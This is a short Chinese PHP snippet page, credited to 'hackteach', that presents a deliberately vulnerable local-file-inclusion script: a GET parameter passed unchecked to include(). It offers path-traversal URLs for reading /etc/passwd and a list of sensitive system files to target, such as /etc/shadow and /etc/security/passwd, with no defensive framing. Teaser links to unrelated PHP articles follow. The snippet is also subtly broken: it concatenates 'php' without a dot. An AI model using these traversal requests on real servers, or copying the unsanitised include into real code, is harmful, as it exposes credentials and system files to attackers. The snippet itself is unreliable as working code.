php 伪造本地文件包含漏洞的代码

yipeiwu_com5年前PHP代码库
代码:
复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

相关文章

php脚本守护进程原理与实现方法详解

本文实例讲述了php脚本守护进程原理与实现方法。分享给大家供大家参考,具体如下: 思路: 1. while 循环,若当前没有数据要操作可以休眠; 2. crontab 脚本每隔固定时间段...

使用session判断用户登录用户权限(超简单)

如下所示:复制代码 代码如下:<form action="#" method=post>用户名:<input type=text name=user><br...

php获取英文姓名首字母的方法

本文实例讲述了php获取英文姓名首字母的方法。分享给大家供大家参考。具体如下: 这段代码可以根据用户输入的英文姓名,分析出姓名的首字母输出,比如"Billy Bob" to "B.B."...

PHP+JavaScript实现无刷新上传图片

html文件代码 <!-- ajax文件上传开始 --> <script type="text/javascript" src="/imageupload/jque...

php中heredoc与nowdoc介绍

Heredoc技术,在正规的PHP文档中和技术书籍中一般没有详细讲述,只是提到了这是一种Perl风格的字符串输出技术。但是现在的一些论坛程序,和部分文章系统,都巧妙的使用heredoc技...